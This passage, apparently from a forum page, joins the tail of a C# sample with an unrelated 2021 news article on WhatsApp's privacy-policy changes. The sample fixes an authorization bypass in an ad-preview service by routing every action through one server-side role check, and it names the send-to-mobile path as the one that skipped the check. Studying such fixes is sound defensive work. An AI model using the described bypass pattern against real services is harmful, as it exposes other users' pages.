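    public Preview(string key, long pageId) { Key = key; PageId = pageId; }
}

public sealed class AdPreviewService
{
    // Stand-in for the real role store: (user, page) pairs with the advertiser role.
    private readonly HashSet<(long UserId, long PageId)> _advertisers = new();
    private readonly Dictionary<string, Preview> _previews = new();
    public List<string> MobileNotifications { get; } = new();
    private int _counter;

    public void GrantAdvertiser(long userId, long pageId) => _advertisers.Add((userId, pageId));

    // The single gate. Every operation that creates, shares or re-renders a preview
    // on a page passes through it, with the page resolved server-side.
    private void RequireAdvertiserRole(long userId, long pageId)
    {
        if (!_advertisers.Contains((userId, pageId)))
            throw new UnauthorizedAccessException($"user {userId} is not an advertiser on page {pageId}");
    }

    // Create: the check the original create path already had.
    public Preview CreatePreview(long userId, long pageId)
    {
        RequireAdvertiserRole(userId, pageId);
        var p = new Preview($"preview-{++_counter}", pageId);
        _previews[p.Key] = p;
        return p;
    }

    // Share: the page comes from the stored preview, not from the request, and the
    // same gate applies before a shareable preview post is materialised.
    public string Share(long userId, string previewKey)
    {
        var p = Lookup(previewKey);
        RequireAdvertiserRole(userId, p.PageId);
        return $"/ads/previewer/{p.Key}";
    }

    // Send-to-mobile: the path the bypass used. It re-creates the preview, so it
    // must pass the same gate as create and share.
    public void NotifyMobile(long userId, string previewKey)
    {
        var p = Lookup(previewKey);
        RequireAdvertiserRole(userId, p.PageId);
        MobileNotifications.Add($"{p.Key} for page {p.PageId}");
    }

    private Preview Lookup(string key) =>
        _previews.TryGetValue(key, out var p) ? p : throw new KeyNotFoundException(key);
}

public static class Demo
{
    public static void Main()
    {
        var svc = new AdPreviewService();
        const long advertiser = 1, outsider = 2, pageA = 100;   // constructed ids
        svc.GrantAdvertiser(advertiser, pageA);

        var preview = svc.CreatePreview(advertiser, pageA);
        Console.WriteLine(svc.Share(advertiser, preview.Key));   // allowed: /ads/previewer/preview-1

        // Each side-effecting entry point denies a user without the role on the page,
        // even one who knows a valid preview key.
        foreach (var action in new Action[] {
            () => svc.CreatePreview(outsider, pageA),
            () => svc.Share(outsider, preview.Key),
            () => svc.NotifyMobile(outsider, preview.Key) })
        {
            try { action(); Console.WriteLine("unexpected: allowed"); }
            catch (UnauthorizedAccessException e) { Console.WriteLine("denied: " + e.Message); }
        }
    }
}
```

In a review, the question to ask of any new endpoint that touches a preview is whether it reaches RequireAdvertiserRole with a page id that the server, not the client, decided on; the notify_mobile bypass above is exactly an endpoint for which that answer was no.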
-
WhatsApp Will Disable Your Account If You Don't Agree Sharing Data With Facebook

January 06, 2021, Ravie Lakshmanan

"Respect for your privacy is coded into our DNA," opens WhatsApp's privacy policy. "Since we started WhatsApp, we've aspired to build our Services with a set of strong privacy principles in mind." But come February 8, 2021, this opening statement will no longer find a place in the policy.

The Facebook-owned messaging service is alerting users in India of an update to its terms of service and privacy policy that's expected to go into effect next month. The "key updates" concern how it processes user data, "how businesses can use Facebook hosted services to store and manage their WhatsApp chats," and "how we partner with Facebook to offer integrations across the Facebook Company Products."

The mandatory changes allow WhatsApp to share more user data with other Facebook companies, including account registration information, phone numbers, transaction data, service-related information, interactions on the platform, mobile device information, IP address, and other data collected based on users' consent. Unsurprisingly, this data sharing policy with Facebook and its other services doesn't apply to EU states that are part of the European Economic Area (EEA), which are governed by the GDPR data protection regulations.

The updates to WhatsApp terms and privacy policy come on the heels of Facebook's "privacy-focused vision" to integrate WhatsApp, Instagram, and Messenger together and provide a more coherent experience to users across its services.

Users failing to agree to the revised terms by the cut-off date will have their accounts rendered inaccessible, the company said in the notification. This effectively means that, while the profiles will remain inactive, WhatsApp will eventually end up deleting the accounts after 120 days of inactivity (i.e. not connected to the app) as part of its efforts to "maintain security, limit data retention, and protect the privacy of our users."

WhatsApp's Terms of Service was last updated on January 28, 2020, while its current Privacy Policy was enforced on July 20, 2020.

Facebook Company Products refers to the social media giant's family of services, including its flagship Facebook app, Messenger, Instagram, Boomerang, Threads, Portal-branded devices, Oculus VR headsets (when using a Facebook account), Facebook Shops, Spark AR Studio, Audience Network, and NPE Team apps. It, however, doesn't include Workplace, Free Basics, Messenger Kids, and Oculus Products that are tied to Oculus accounts.

What's Changed in its Privacy Policy?

In its updated policy, the company expands on the "Information You Provide" section with specifics about payment account and transaction information collected during purchases made via the app and has replaced the "Affiliated Companies" section with a new "How We Work With Other Facebook Companies" that goes into detail about how it uses and shares the information gathered from WhatsApp with other Facebook products or third-parties.

This encompasses promoting safety, security, and integrity, providing Portal and Facebook Pay integrations, and last but not least, "improving their services and your experiences using them, such as making suggestions for you (for example, of friends or group connections, or of interesting content), personalizing features and content, helping you complete purchases and transactions, and showing relevant offers and ads across the Facebook Company Products."

One section that's received a major rewrite is "Automatically Collected Information," which covers "Usage and log Information," "Device And Connection Information," and "Location Information."

"We collect information about your activity on our Services, like service-related, diagnostic, and performance information. This includes information about your activity (including how you use our Services, your Services settings, how you interact with others using our Services (including when you interact with a business), and the time, frequency, and duration of your activities and interactions), log files, and diagnostic, crash, website, and performance logs and reports. This also includes information about when you registered to use our Services; the features you use like our messaging, calling, Status, groups (including group name, group picture, group description), payments or business features; profile photo, "about" information; whether you are online, when you last used our Services (your "last seen"); and when you last updated your "about" information."

WhatsApp's revised policy also spells out the kind of information it gathers from users' devices: hardware model, operating system information, battery level, signal strength, app version, browser information, mobile network, connection information (including phone number, mobile operator or ISP), language and time zone, IP address, device operations information, and identifiers (including identifiers unique to Facebook Company Products associated with the same device or account).

"Even if you do not use our location-related features, we use IP addresses and other information like phone number area codes to estimate your general location (e.g., city and country)," WhatsApp's updated policy reads.

Concerns About Metadata Collection

While WhatsApp is end-to-end encrypted, its privacy policy offers an insight into the scale and wealth of metadata that's amassed in the name of improving and supporting the service. Even worse, all of this data is linked to a user's identity.

Apple's response to this unchecked metadata collection is privacy labels, now live for first- and third-party apps distributed via the App Store, that aim to help users better understand an app's privacy practices and "learn about some of the data types an app may collect, and whether that data is linked to them or used to track them."

The rollout forced WhatsApp to issue a statement last month. "We must collect some information to provide a reliable global communications service," it said, adding "we minimize the categories of data that we collect" and "we take measures to restrict access to that information."

In stark contrast, Signal collects no metadata, whereas Apple's iMessage makes use of only email address (or phone number), search history, and a device ID to attribute a user uniquely.

There's no denying that privacy policies and terms of service agreements are often long, boring, and mired in obtuse legalese as if deliberately designed with an intention to confuse users. But updates like this are the reason it's essential to read them instead of blindly consenting without really knowing what you are signing up for. After all, it is your data.

UPDATE: Why Zuckerberg Wants to Integrate WhatsApp and Facebook?

In a statement shared with The Hacker News, a WhatsApp spokesperson justifies integrating both platforms by saying:

"As we announced in October, WhatsApp wants to make it easier for people to both make a purchase and get help from a business directly on WhatsApp. While most people use WhatsApp to chat with friends and family, increasingly people are reaching out to businesses as well. To further increase transparency, we updated the privacy policy to describe that going forward businesses can choose to receive secure hosting services from our parent company Facebook to help manage their communications with their customers on WhatsApp."

"Though of course, it remains up to the user whether or not they want to message with a business on WhatsApp. The update does not change WhatsApp's data sharing practices with Facebook and does not impact how people communicate privately with friends or family wherever they are in the world. WhatsApp remains deeply committed to protecting people's privacy. We are communicating directly with users through WhatsApp about these changes so they have time to review the new policy over the course of the next month."

Sursa: https://thehackernews.com/2021/01/whatsapp-will-delete-your-account-if.html